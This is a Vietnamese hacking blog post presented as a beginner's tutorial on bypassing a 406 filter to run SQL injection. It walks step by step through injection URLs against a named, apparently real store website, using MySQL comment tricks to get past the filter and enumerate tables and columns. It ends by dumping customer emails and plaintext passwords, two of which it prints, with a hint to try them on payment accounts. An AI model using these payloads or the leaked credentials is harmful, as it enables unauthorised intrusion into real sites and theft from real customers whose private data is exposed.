Tuesday, June 19, 2012

Hôm này khai mạc Euro 2012 nên mình mạo muội làm cái tut sql dạng 406 cho Newbie mong các bạn biết rồi đừng ném gạch nhuể.

Site:

Code:
http://www.jansancleaningsupplies.com/index.php?pid=47'
+ Order by:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 1
-->Ko lỗi.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 2
-->lỗi.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION SELECT 1-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+ Tiến hành By pass:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1-- -
-> 1
+Get table:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1 group_concat(table_name) from information_schema.tables where table_name=database()-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+Tiếp tục by pass:
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!table_name*/))) from information_schema./*!tables*/ where table_schema=database()-- -
-->
articles,auth,categories,customers,manufacturers,o rders,products,specialfiles
+ Get colums: customers
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!column_name*/))) from information_schema./*!columns*/ where table_schema=database() and /*!table_name*/=0x637573746f6d657273-- -
-->
id,email,password,passhash,joindate,firstname,mi,l astname,companyname,street1,
street2,city,state,zipcode,priphone,secphone,getem ail,billme,shipping,orders
+Get id,email,password:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!id,0x7c,email,0x7c,password*/))) from customers-- -
-->
4|dpdurrell@hotmail.com|preston59

3|josh@uppertech.net|eeq7322
----> Check PP .
Tut by Co0c.

[Tut] Bypass 406 SQL for Newbie

  • Uploaded by: MIN Software
  • Views:
  • Category: , ,
    • Share

    0 comments:

    Post a Comment

    Subscribe to: Post Comments (Atom)

     

    Our Team Members

    Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com